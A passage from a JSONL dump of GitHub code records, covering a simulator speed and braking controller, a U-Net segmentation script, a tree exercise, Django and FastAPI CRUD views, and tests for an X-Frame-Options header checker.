控制阈值2\n\"\"\"\n\n\"\"\"\n\n\ndef lontitudeControlSpeed(speed, lonPid):\n lonPid.update(speed - 5.0)\n if lonPid.output > speedPidThread_1: # 加速阶段\n\n # print(\"==============================================\")\n # print('speed is:', speed, 'output is:', lonPid.output, 'stage 1')\n # print(\"==============================================\")\n lonPid.thorro_ = 1\n lonPid.brake_ = 0\n\n elif lonPid.output > speedPidThread_2: # 稳定控速阶段\n\n # print(\"==============================================\")\n # print('speed is:', speed, 'output is:', lonPid.output, 'stage 2')\n # print(\"==============================================\")\n\n lonPid.thorro_ = min((lonPid.output / speedPidThread_1) * 0.85, 1.0)\n lonPid.brake_ = min(((speedPidThread_1 - lonPid.output) / speedPidThread_1) * 0.1, 1.0)\n\n elif lonPid.output > 0: # 下侧 微调\n\n # print(\"==============================================\")\n # print('speed is:', speed, 'output is:', lonPid.output, 'stage 3')\n # print(\"==============================================\")\n lonPid.thorro_ = (lonPid.output / speedPidThread_2) * 0.3\n lonPid.brake_ = ((speedPidThread_2 - lonPid.output) / speedPidThread_2) * 0.2\n\n elif lonPid.output < -1 * speedPidThread_1: # 减速阶段\n\n # print(\"==============================================\")\n # print('speed is:', speed, 'output is:', lonPid.output, 'stage 4')\n # print(\"==============================================\")\n lonPid.thorro_ = (-1 * lonPid.output / 5) * 0.1\n lonPid.brake_ = 0.5\n\n\n else:\n # print(\"==============================================\")\n # print('speed is:', speed, 'output is:', lonPid.output, 'stage 5')\n # print(\"==============================================\")\n lonPid.thorro_ = (-1 * lonPid.output / speedPidThread_2) * 0.2\n lonPid.brake_ = ((speedPidThread_2 - (-1 * lonPid.output)) / speedPidThread_2) * 0.4\n # print(lonPid.thorro_, ' ', lonPid.brake_)\n\n\ndef getTTC(current_speed, current_acceleration, dist, safe_dist):\n v = current_speed\n a = current_acceleration\n\n if a != 0:\n ttc = (-v + np.sqrt(v ** 2 + 2 * a * (dist - safe_dist))) / a\n else:\n ttc = 999\n\n return ttc\n\n\ndef set_state(myCar, Controller, control_data_package, radar_data_package, line_data_package):\n # 当前车速\n spd = control_data_package.json['FS']\n\n # 当前偏航角\n yaw = control_data_package.json['CAO']\n\n # 当前角速度\n yr = control_data_package.json['YR']\n\n if radar_data_package is not None:\n # 筛选出距离最近的车\n mindis_car = None\n MIN_DIS = 9999.99\n mindis_car = min(radar_data_package.json, key=lambda car: car['Range'])\n\n if mindis_car is not None:\n # v: cm/s\n # 相对前车的速度\n delta_spd = mindis_car[\"Speed\"] / 100 # m/s\n print(\"与前车相对速度:\", delta_spd)\n\n # 相对前车的距离\n dist = mindis_car[\"Range\"] / 100 # m\n print(\"与前车相对距离:\", dist)\n\n myCar.dist = dist\n\n myCar.delta_v = delta_spd\n\n print(\"min dis car:\", mindis_car)\n\n if line_data_package is not None:\n\n if len(line_data_package.json) == 4:\n myCar.positionnow = -6.5 + (line_data_package.json[2]['A1'] + line_data_package.json[1]['A1'])\n else:\n print(\"ERROR\")\n myCar.positionnow = -7.0\n\n # 保存当前的状态\n\n myCar.speed = spd\n myCar.cao = yaw\n myCar.yr = yr\n\n return myCar\n\n\ndef run_task0_test(myCar, Controller, control_data_package, radar_data_package, line_data_package):\n # 根据题目重新定义myCar\n myCar = set_state(myCar, Controller, control_data_package, radar_data_package, line_data_package)\n\n # 如果想使用ttc模型的话,必须先测得到他的加速度\n\n Controller.speedPid.setSetpoint(60)\n\n # 纵向控制 thorro_ and brake_\n lontitudeControlSpeed(myCar.speed, Controller.speedPid)\n\n # 横向不需要控制\n\n Controller.latPid.steer_ = 0\n\n # print(\"spd:\", myCar.speed)\n # print(\"position:\", myCar.positionnow)\n\n if myCar.delta_v != 0:\n dt = np.round(myCar.dist / myCar.delta_v, 3)\n # dt = 0.3\n else:\n dt = 999\n\n delta_a = np.round(myCar.delta_v / dt, 3)\n\n # flag = True\n # while flag:\n # t1 = time.time()\n\n # print(\"dt:\", -dt,\"delta_a:\",delta_a)\n ttc = getTTC(myCar.speed, delta_a, myCar.dist, safe_dist=0.5)\n\n # dist = 10, ttc = 4\n # 30 --> 4, 20 --> 4 , 0 --> 2, avg = 20\n\n # 30 --> 4, 20 --> 3 , 0 --> 3, avg = 18\n # if myCar.dist < 10 and ttc < 4:\n\n DANGER = False\n\n if myCar.dist < 7.3:\n DANGER = True\n\n if myCar.dist < 18 and myCar.delta_v < -10:\n DANGER = True\n\n if ttc > 0.55 and not DANGER and ttc != 999:\n # 正常情况下使用PID来进行纵向控制\n print(\"正常情况PID:ttc:\", ttc)\n ADCPlatform.control(Controller.speedPid.thorro_, Controller.latPid.steer_, 0, 1)\n\n elif ttc <= 0.55 and not DANGER:\n print(\"软刹车:dist:\", myCar.dist, \"ttc:\", ttc, \"delta_a:\", delta_a)\n brake_ = 0.14 * delta_a\n ADCPlatform.control(0, 0, brake_, 1)\n\n elif DANGER:\n # 如果太近了,硬刹车\n print(\"硬刹车:danger!\")\n ADCPlatform.control(0, 0, 1, 1)\n\n # print(\"\\t\", \"与前车距离:\", myCar.dist, \"\\t\", \"自车速度:\", myCar.speed, \"\\t\", \"相对速度:\", myCar.delta_v, \"\\t\", \"相对加速度:\", delta_a)\n print(\"----------------------------------------------------------------------------------------\")\n","repo_name":"6Lackiu/WIDCAutonomousDriving","sub_path":"control/task/task0.py","file_name":"task0.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"8257992922","text":"import tensorflow as tf\nimport glob\nimport src.data as data\nimport Program.show as show\nimport Program.model as MYMODEL\nfrom tensorflow_examples.models.pix2pix import pix2pix\nimport tensorflow_datasets as tfds\n\ntfds.disable_progress_bar()\nfrom IPython.display import clear_output\nimport matplotlib.pyplot as plt\n\n# Datasets, info = tfds.load('oxford_iiit_pet:3.*.*', with_info=True)\nimages_file_path = '..\\\\..\\\\DATA\\\\ISIC2016\\\\ISBI2016_ISIC_Part1_Training_Data\\\\*jpg'\nmasks_file_path = '..\\\\..\\\\DATA\\\\ISIC2016\\\\ISBI2016_ISIC_Part1_Training_GroundTruth\\\\*.png'\n\n# images_file_path = \"..\\\\..\\\\DATA\\\\Oxford-IIIT Pet\\\\images\\\\*jpg\"\n# masks_file_path = \"..\\\\..\\\\DATA\\\\Oxford-IIIT Pet\\\\annotations\\\\trimaps\\\\*.png\"\n\nimages_path = glob.glob(images_file_path)\nmasks_path = glob.glob(masks_file_path)\n\ntrain_count = int(len(images_path) * 0.8) # 80%\ntest_count = len(images_path) - train_count # 20%\nprint('数据集个数:', len(images_path),\n '训练集个数:', train_count, '测试集个数:', test_count)\n\nbatch_size = 64\nbuffer_size = 1000\ntrain_dataset, test_dataset, train, test = data.distribute(images_path, masks_path, test_count, batch_size, buffer_size)\nsteps_per_epoch = train_count // batch_size # 900*0.8/64=11\nprint('测试集图片个数:', train_count, '每步epoch:', steps_per_epoch)\n\n# train: \n# test: \n# train_dataset: \n# test_dataset: \n\n\nfor image, mask in train.take(1):\n sample_image, sample_mask = image, mask\nshow.display([sample_image, sample_mask])\n\n# 输出信道数量为 3 是因为每个像素有三种可能的标签。把这想象成一个多类别分类,每个像素都将被分到三个类别当中。\nOUTPUT_CHANNELS = 3\n\n# 编码器是一个预训练的 MobileNetV2 模型,它在 tf.keras.applications 中已被准备好并可以直接使用。\nbase_model = tf.keras.applications.MobileNetV2(input_shape=[128, 128, 3], include_top=False)\n# base_model = tf.keras.applications.MobileNetV2()\n# \n\n# 使用这些层的激活设置\nlayer_names = [\n 'block_1_expand_relu', # 64x64\n 'block_3_expand_relu', # 32x32\n 'block_6_expand_relu', # 16x16\n 'block_13_expand_relu', # 8x8\n 'block_16_project', # 4x4\n]\nlayers = [base_model.get_layer(name).output for name in layer_names]\n\n# 创建特征提取模型\ndown_stack = tf.keras.Model(inputs=base_model.input, outputs=layers)\n\ndown_stack.trainable = False\n\n# 解码器/升频取样器是简单的一系列升频取样模块,在 TensorFlow examples 中曾被实施过。\nup_stack = [\n pix2pix.upsample(512, 3), # 4x4 -> 8x8\n pix2pix.upsample(256, 3), # 8x8 -> 16x16\n pix2pix.upsample(128, 3), # 16x16 -> 32x32\n pix2pix.upsample(64, 3), # 32x32 -> 64x64\n]\n\n\ndef unet_model(output_channels):\n inputs = tf.keras.layers.Input(shape=[128, 128, 3])\n x = inputs\n\n # 在模型中降频取样\n skips = down_stack(x)\n x = skips[-1]\n skips = reversed(skips[:-1])\n\n # 升频取样然后建立跳跃连接\n for up, skip in zip(up_stack, skips):\n x = up(x)\n concat = tf.keras.layers.Concatenate()\n x = concat([x, skip])\n\n # 这是模型的最后一层\n last = tf.keras.layers.Conv2DTranspose(\n output_channels, 3, strides=2,\n padding='same') # 64x64 -> 128x128\n\n x = last(x)\n\n return tf.keras.Model(inputs=inputs, outputs=x)\n\n\nmodel = unet_model(OUTPUT_CHANNELS)\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n# 快速浏览一下最终的模型架构:\ntf.keras.utils.plot_model(model, show_shapes=True)\n\n\n# 预测值\ndef create_mask(pred_mask):\n pred_mask = tf.argmax(pred_mask, axis=-1)\n pred_mask = pred_mask[..., tf.newaxis]\n return pred_mask[0]\n\n\ndef show_predictions(dataset=None, num=1):\n if dataset:\n for image, mask in dataset.take(num):\n pred_mask = model.predict(image)\n show.display([image[0], mask[0], create_mask(pred_mask)])\n else:\n show.display([sample_image, sample_mask,\n create_mask(model.predict(sample_image[tf.newaxis, ...]))])\n\n\nshow_predictions()\n\n\nclass DisplayCallback(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n clear_output(wait=True)\n show_predictions()\n print('\\nSample Prediction after epoch {}\\n'.format(epoch + 1))\n\n\nEPOCHS = 20\nVAL_SUBSPLITS = 5\nVALIDATION_STEPS = test_count // batch_size // VAL_SUBSPLITS\n\nmodel_history = model.fit(train_dataset, epochs=EPOCHS,\n steps_per_epoch=steps_per_epoch,\n validation_steps=VALIDATION_STEPS,\n validation_data=test_dataset,\n callbacks=[DisplayCallback()])\n\nloss = model_history.history['loss']\nval_loss = model_history.history['val_loss']\n\nepochs = range(EPOCHS)\n\nplt.figure()\nplt.plot(epochs, loss, 'r', label='Training loss')\nplt.plot(epochs, val_loss, 'bo', label='Validation loss')\nplt.title('Training and Validation Loss')\nplt.xlabel('Epoch')\nplt.ylabel('Loss Value')\nplt.ylim([0, 1])\nplt.legend()\nplt.show()\n\n# show_predictions(test_dataset, 3)\n","repo_name":"zmoth/image_segmentation","sub_path":"reference/Unet_tensorflow.py","file_name":"Unet_tensorflow.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"18707050362","text":"import random\nimport unittest\n\nclass Node():\n def __init__(self, data=None, left=None, right=None):\n self.data, self.left, self.right = data, left, right\n self.count = 1\n if self.left:\n self.count += self.left.count\n if self.right:\n self.count += self.right.count\n\n def number_node(self, num):\n if num == 0:\n return self\n if self.left:\n # 현재 노드 왼쪽에 주어진 num보다 많은 자식들이 있는지 확인\n if num - 1 < self.left.count:\n return self.left.number_node(num-1)\n # 현재 노드 왼쪽에 num보다 자식이 적으면 오른쪽 자식들로 진행\n elif self.right:\n return self.right.number_node(num - 1 - self.left.count)\n if self.right:\n return self.right.number_node(num-1)\n return None\n\n def random_node(self):\n return self.number_node(randint(0, self.count - 1))\n\nfixed_num = False\n\ndef randint(start, end):\n if not fixed_num is False:\n return fixed_num\n return random.randint(start, end)\n\nclass Test(unittest.TestCase):\n def test_mock_randint(self):\n global fixed_num\n fixed_num = 12\n self.assertEqual(randint(0, 2000), 12)\n\n def test_get_random_value(self):\n global fixed_num\n tree = Node(11, Node(21, Node(31), Node(32, Node(41), Node(42, None, Node(51)))),\n Node(22, Node(33), Node(34)))\n fixed_num = 0\n self.assertEqual(tree.random_node().data, 11)\n fixed_num = 4\n self.assertEqual(tree.random_node().data, 41)\n fixed_num = 8\n self.assertEqual(tree.random_node().data, 33)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"Already-Ready/CtCI_Python","sub_path":"Ch_4/Q4_11_random_node.py","file_name":"Q4_11_random_node.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"16882186552","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n# from login.models import Login\nfrom lists.models import Lists\nfrom django.contrib.auth.decorators import login_required\n# from django.contrib.auth import authenticate\nfrom django.contrib import messages\nfrom lists.models import Projet , Nature , Emplacement\nfrom lists.forms import ProjetForm , NatureForm, EmplacementForm , UpdateProjetForm , UpdateNatureForm , UpdateEmplacementForm\nfrom dashboard.models import ProjectStats\nfrom .filters import filtrer_par_projet , filtrer_par_nature , filtrer_par_emplacement\n\n\n# login required for acces\n@login_required(login_url='acces')\ndef flists(request):\n emplacements=Emplacement.objects.filter(user=request.user).order_by('-id')\n projets=Projet.objects.filter(user=request.user).order_by('-id')\n natures=Nature.objects.filter(user=request.user).order_by('-id')\n # users=Login.objects.filter(user=request.user).order_by('-id')\n lists=Lists.objects.filter(user=request.user).order_by('-id')\n filterProjet=filtrer_par_projet(request.GET , queryset=projets , request=request)\n projets=filterProjet.qs \n filterNature=filtrer_par_nature(request.GET , queryset=natures , request=request)\n natures=filterNature.qs\n filterEmplacement=filtrer_par_emplacement(request.GET , queryset=emplacements , request=request)\n emplacements=filterEmplacement.qs\n context = {'lists':lists , 'projets':projets , 'natures':natures , 'emplacements':emplacements , 'filterProjet':filterProjet , 'filterNature':filterNature ,'filterEmplacement':filterEmplacement }\n return render(request , 'lists/lists.html' , context)\n\n\n\n\n@login_required(login_url='my-login')\ndef create_projet(request):\n if request.method == \"POST\":\n form = ProjetForm(request.POST)\n if form.is_valid():\n projet = form.save(commit=False)\n projet.user = request.user\n projet.save()\n\n # Create or update the ProjectStats record\n dashboard_project, created = ProjectStats.objects.get_or_create(user=request.user)\n dashboard_project.update_stats()\n\n return redirect('lists')\n else:\n print(\"Form is not valid\")\n return redirect('lists')\n else:\n form = ProjetForm()\n\n return render(request, 'lists/create_projet.html', {'form': form})\n\n\n\n\n\n\n\n@login_required(login_url='my-login')\ndef delete_projet(request, pk):\n\n projet = Projet.objects.get(id=pk)\n\n projet.delete()\n \n # Create or update the ProjectStats record\n dashboard_project, created = ProjectStats.objects.get_or_create(user=request.user)\n dashboard_project.update_stats()\n\n return redirect(\"lists\")\n\n\n\n\n\n@login_required(login_url='acces')\ndef create_nature(request):\n form = NatureForm()\n\n if request.method == \"POST\":\n form = NatureForm(request.POST or None)\n if form.is_valid():\n nature=form.save(commit=False)\n nature.user = request.user\n nature.save()\n return redirect('lists')\n else:\n print(\"form is not valid\")\n return redirect('lists')\n\n return render(request , 'lists/create_nature.html' , {'form': form})\n\n\n\n\n\n@login_required(login_url='acces')\ndef create_emplacement(request):\n form = EmplacementForm()\n\n if request.method == \"POST\":\n form = EmplacementForm(request.POST or None)\n if form.is_valid():\n emplacement=form.save(commit=False)\n emplacement.user = request.user\n emplacement.save()\n return redirect('lists')\n else:\n print(\"form is not valid\")\n return redirect('lists')\n\n return render(request , 'lists/create_emplacement.html' , {'form': form})\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_projet(request, pk):\n\n projet = Projet.objects.get(id=pk)\n\n form = UpdateProjetForm(instance=projet)\n\n if request.method == 'POST':\n\n form = UpdateProjetForm(request.POST, instance=projet)\n\n if form.is_valid():\n\n form.save()\n\n return redirect(\"lists\")\n \n context = {'form':form}\n\n return render(request, 'lists/update-projet.html', context=context)\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_projet(request, pk):\n\n projet = Projet.objects.get(id=pk)\n\n form = UpdateProjetForm(instance=projet)\n\n if request.method == 'POST':\n\n form = UpdateProjetForm(request.POST, instance=projet)\n\n if form.is_valid():\n\n form.save()\n\n return redirect(\"lists\")\n \n context = {'form':form}\n\n return render(request, 'lists/update-projet.html', context=context)\n\n\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_nature(request, pk):\n\n nature = Nature.objects.get(id=pk)\n\n form = UpdateNatureForm(instance=nature)\n\n if request.method == 'POST':\n\n form = UpdateNatureForm(request.POST, instance=nature)\n\n if form.is_valid():\n\n form.save()\n\n return redirect(\"lists\")\n \n context = {'form':form}\n\n return render(request, 'lists/update-nature.html', context=context)\n\n\n\n\n\n\n@login_required(login_url='my-login')\ndef delete_nature(request, pk):\n\n nature = Nature.objects.get(id=pk)\n\n nature.delete()\n\n return redirect('lists')\n\n\n\n\n\n\n\n@login_required(login_url='acces')\ndef update_emplacement(request, pk):\n\n emplacement = Emplacement.objects.get(id=pk)\n\n form = UpdateEmplacementForm(instance=emplacement)\n\n if request.method == 'POST':\n\n form = UpdateEmplacementForm(request.POST, instance=emplacement)\n\n if form.is_valid():\n\n form.save()\n\n return redirect(\"lists\")\n \n context = {'form':form}\n\n return render(request, 'lists/update-emplacement.html', context=context)\n\n\n\n\n\n\n\n\n@login_required(login_url='my-login')\ndef delete_emplacement(request, pk):\n\n emplacement = Emplacement.objects.get(id=pk)\n\n emplacement.delete()\n\n return redirect('lists')","repo_name":"saber0amine/GIDNA","sub_path":"djangoT/lists/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"884207794","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom flask import make_response\n\nfrom base import TestPluginBaseClass, test_app\n\n@test_app.route('/xfo-with-deny')\ndef xfo_with_deny():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'DENY'\n return res\n\n@test_app.route('/xfo-with-sameorigin')\ndef xfo_with_sameorigin():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'SAMEORIGIN'\n return res\n\n@test_app.route('/xfo-with-allow-from')\ndef xfo_with_allow_from():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'ALLOW-FROM http://localhost:1234/'\n return res\n\n@test_app.route('/xfo-with-allow-from-with-colon')\ndef xfo_with_allow_from_with_colon():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'ALLOW-FROM: http://localhost:1234/'\n return res\n\n@test_app.route('/xfo-with-allow-from-without-http')\ndef xfo_with_allow_from_withou_http():\n res = make_response(\"\")\n res.headers['X-Frame-Options'] = 'ALLOW-FROM localhost:1234/'\n return res\n\n@test_app.route('/bad-xfo')\ndef bad_xfo():\n res = make_response(\"

Hello World!

\")\n res.headers['X-Frame-Options'] = \"CHEESE\"\n return res\n\n@test_app.route('/no-xfo')\ndef no_xfo():\n res = make_response(\"\")\n return res\n\nclass TestXFrameOptionsPlugin(TestPluginBaseClass):\n __test__ = True\n @classmethod\n def setUpClass(cls):\n super(TestXFrameOptionsPlugin, cls).setUpClass()\n cls.pname = \"XFrameOptionsPlugin\"\n\n def validate_xframe_plugin(self, runner_resp, request_resp, expected=None, expectation=True):\n if expectation is True:\n self.assertEqual('X-Frame-Options header is set properly', runner_resp[1]['data']['Summary'])\n self.assertEqual('Info', runner_resp[1]['data']['Severity'])\n self.assertEqual(expected, request_resp.headers['X-Frame-Options'])\n elif expectation == 'INVALID':\n fragement = request_resp.headers['X-Frame-Options']\n self.assertEqual(True, fragement in runner_resp[1]['data']['Description'])\n self.assertEqual(\"High\", runner_resp[1]['data']['Severity'])\n self.assertEqual(\"The following X-Frame-Options header value is detected and is invalid: %s\" % fragement, \\\n runner_resp[1]['data']['Description'])\n self.assertEqual(expected, request_resp.headers['X-Frame-Options'])\n else:\n self.assertEqual(True, \"X-Frame-Options header is not found.\" in runner_resp[1]['data']['Description'])\n\n def test_bad_xframe_option(self):\n api_name = \"/bad-xfo\"\n self.validate_plugin(api_name, self.validate_xframe_plugin, expected='CHEESE', expectation='INVALID')\n\n def test_xframe_option_with_same_origin(self):\n api_name = '/xfo-with-sameorigin'\n self.validate_plugin(api_name, self.validate_xframe_plugin, expected='SAMEORIGIN', expectation=True)\n\n def test_xframe_option_with_deny(self):\n api_name = '/xfo-with-deny'\n self.validate_plugin(api_name, self.validate_xframe_plugin, expected='DENY', expectation=True)\n\n def test_xframe_option_with_allow_from(self):\n api_name = '/xfo-with-allow-from'\n self.validate_plugin(api_name, self.validate_xframe_plugin, \\\n expected='ALLOW-FROM http://localhost:1234/', expectation=True)\n\n def test_xframe_option_with_allow_from_colon_gets_rejected(self):\n api_name = '/xfo-with-allow-from-with-colon'\n self.validate_plugin(api_name, self.validate_xframe_plugin, \\\n expected='ALLOW-FROM: http://localhost:1234/', expectation='INVALID')\n\n def test_xframe_option_without_http(self):\n api_name = '/xfo-with-allow-from-without-http'\n self.validate_plugin(api_name, self.validate_xframe_plugin, \\\n expected='ALLOW-FROM localhost:1234/', expectation='INVALID')\n\n def test_xframe_options_not_set(self):\n api_name = '/no-xfo'\n self.validate_plugin(api_name, self.validate_xframe_plugin, expectation=False)\n","repo_name":"mozmark/minion-backend","sub_path":"tests/functional/plugins/test_xframe.py","file_name":"test_xframe.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"31321132947","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('search', '0047_auto_20211130_1752'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='basket',\n name='created',\n field=models.DateTimeField(default=datetime.date(1970, 1, 1), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='basket',\n name='modified',\n field=models.DateTimeField(default=datetime.date(1970, 1, 1), auto_now=True),\n preserve_default=False,\n ),\n ]\n","repo_name":"vindarel/abelujo","sub_path":"search/migrations/0048_auto_20211211_1156.py","file_name":"0048_auto_20211211_1156.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"39475789844","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom enum import Enum\n\n\nfrom views.serializer.to_json import build_toJson\nfrom views.notefiscalSchemas import noteficalSchemas\nfrom dbconnection.connection import get_db\nfrom orm import ormNotefical\n\n\nrouter = APIRouter()\n\nclass Tags(Enum):\n name = \"invoice\"\n\n@router.post('/v1/api/note/', response_model=noteficalSchemas, tags=[Tags.name])\nasync def post(note: noteficalSchemas, db: Session = Depends(get_db)):\n data, status = ormNotefical.add_notes(db, note)\n return build_toJson(status=status, content=data)\n\n@router.get('/v1/api/notes/', response_model=noteficalSchemas, tags=[Tags.name] )\nasync def get(skip: int = 0, limit: int = 20, db: Session = Depends(get_db)):\n data, status = ormNotefical.get_notes(db, skip, limit)\n return build_toJson(status=status, content=data)\n\n@router.get('/v1/api/note/{id}', response_model=noteficalSchemas, tags=[Tags.name])\nasync def get_byid(id: str, db: Session = Depends(get_db)):\n data, status = ormNotefical.get_byId_notes(db, id)\n return build_toJson(status=status, content=data)\n\n@router.put('/v1/api/note/{id}', response_model=noteficalSchemas, tags=[Tags.name])\nasync def put(note: noteficalSchemas, id: str, db: Session = Depends(get_db)):\n data, status = ormNotefical.put_notes(db, note, id)\n return build_toJson(status=status, content=data)\n\n@router.delete('/v1/api/note/{id}', response_model=noteficalSchemas, tags=[Tags.name])\nasync def delete(id: str, db: Session = Depends(get_db)):\n data, status = ormNotefical.delete_notes(db, id)\n return build_toJson(status=status, content=data)\n\n ","repo_name":"raianb-dev/commercial-system","sub_path":"routers/routeNotefiscal.py","file_name":"routeNotefiscal.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38182822604","text":"def search_contact(base,contact):\n contacts=base.split('\\n')\n flag=True\n result=[]\n \n for i in contacts:\n if contact in i:\n flag=False\n result.append(i)\n if flag:\n result.append('Контакт не найден')\n return result\n\ndef search_contact_by_id(base,id_str):\n contacts=base.split('\\n')\n flag=True\n result=[]\n for i in contacts:\n contact_data=i.split('; ')\n if id_str==contact_data[0]:\n flag=False\n result.append(i)\n return result\n if flag:\n result.append('Контакт не найден')\n return result\n\ndef get_all_ids(base):\n contacts=base.split('\\n')\n result=[]\n for i in contacts:\n contact_data=i.split('; ')\n result.append(contact_data[0])\n return result\n\n \n \n \n\n# def new_id(base):\n# if len(base.split('\\n'))==0:\n# return 1\n# else:\n# return int(base.split('\\n')[len(base.split('\\n')-1)].split(';')[0])+1\n\n\ndef del_contact(base,result):\n base=base.split('\\n')\n base.remove(result)\n return base\n\ndef edit_contact(base,contact,new_contact):\n base=base.split('\\n')\n print(contact)\n id=contact.split( )[0]\n print(id)\n index=base.index(contact)\n base[index]=id +' '+new_contact\n return base \n","repo_name":"MaksimKutlaev/Python","sub_path":"DZ/DZ8/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"42193838390","text":"from django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render,redirect\nfrom .forms import BookingForm\nfrom .models import Menu, Category,Cart,Order,OrderItem,Deliverystatus,Rating,Booking\nfrom rest_framework import generics\nfrom .serializers import MenuItemSerializer, CategorySerializer,RatingSerializer,CartSerializer,OrderSerializer,OrderItemSerializer,BookingSerializer\nfrom rest_framework import permissions\nfrom django.contrib.auth.models import User,Group\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import TokenAuthentication, SessionAuthentication\nfrom django.utils import timezone\nfrom rest_framework.response import Response\nfrom rest_framework import status, viewsets,generics\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.throttling import AnonRateThrottle, UserRateThrottle\nfrom django.core.exceptions import PermissionDenied\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import datetime\nimport json\nfrom django.views import View\nimport requests\nfrom djoser.views import TokenCreateView\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom datetime import datetime, timedelta\nfrom django.contrib.auth.decorators import login_required \nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.decorators import action\nfrom django.utils.decorators import method_decorator\nfrom restaurant.utils import get_user_orders,get_or_create_cart_entry,YourPaginationClass\nfrom .perm import IsManager,IsManagerOrReadOnly,IsDeliveryCrew,IsOrderOwner\n\n\n\n\n\n\nclass CustomTokenCreateView(View):\n template_name = 'login.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name)\n\n def post(self, request, *args, **kwargs):\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(request, username=username, password=password)\n\n if user:\n # If the credentials are correct, log in the user\n login(request, user)\n\n # Redirect to a secure and trusted URL after successful login\n return redirect('restaurant:home')\n else:\n # If the credentials are incorrect, provide an error message\n return render(request, self.template_name, {'error_message': 'Incorrect credentials. Please try again.'})\n\nclass RegistrationView(View):\n template_name = 'registration.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name)\n\n def post(self, request, *args, **kwargs):\n # Extract user registration data from the form\n email = request.POST.get('email')\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n # Djoser registration endpoint URL\n djoser_registration_url = 'http://localhost:8000/api/users/'\n\n # Data to be sent to Djoser registration endpoint\n registration_data = {\n 'email': email,\n 'username': username,\n 'password': password,\n }\n\n # Make a POST request to Djoser registration endpoint\n response = requests.post(djoser_registration_url, data=registration_data)\n\n # Check the response from Djoser\n if response.status_code == 201: # Successful registration\n return render(request, self.template_name, {'success_message': 'Registration successful'})\n else: # Registration failed\n return render(request, self.template_name, {'error_message': response.text})\n\n\n\ndef home(request):\n print(f\"Request headers: {request.headers}\")\n\n print(f\"Session data: {request.session.items()}\")\n print(f\"User: {request.user}\")\n print(f\"Is authenticated? {request.user.is_authenticated}\")\n\n return render(request, 'index.html')\n\ndef about(request):\n return render(request, 'about.html')\n\n\n\n\n\n\n\nclass BookingViewSet(viewsets.ModelViewSet):\n permission_classes = [IsAuthenticated]\n authentication_classes = [TokenAuthentication, SessionAuthentication]\n\n \n queryset = Booking.objects.all()\n serializer_class = BookingSerializer\n\n def list(self, request, *args, **kwargs):\n # Print statement to check if the session token is present in the headers\n print(f\"Request Headers: {request.headers}\")\n\n return super().list(request, *args, **kwargs)\n\n\n\ndef book(request):\n form = BookingForm()\n if request.method == 'POST':\n form = BookingForm(request.POST)\n if form.is_valid():\n form.save()\n context = {'form': form}\n return render(request, 'book.html', context)\n\n\n\n@csrf_exempt\ndef bookings(request):\n if request.method == 'POST':\n data = json.load(request)\n exist = Booking.objects.filter(reservation_date=data['reservation_date']).filter(\n reservation_slot=data['reservation_slot']).exists()\n if not exist:\n # Get the user making the reservation\n user = request.user\n\n # Retrieve the menu based on the provided menu_id (adjust the key based on your actual data structure)\n menu_id = data.get('menu', None)\n menu = Menu.objects.get(id=menu_id) if menu_id else None\n\n\n #selected_time = ... # get this value based on frontend logic\n \n\n\n # Create the Booking object with user and menu\n booking = Booking(\n user=user,\n first_name=data['first_name'],\n reservation_date=data['reservation_date'],\n reservation_slot=data['reservation_slot'],\n menu=menu,\n #reservation_time=selected_time, # User-selected time for the reservation\n 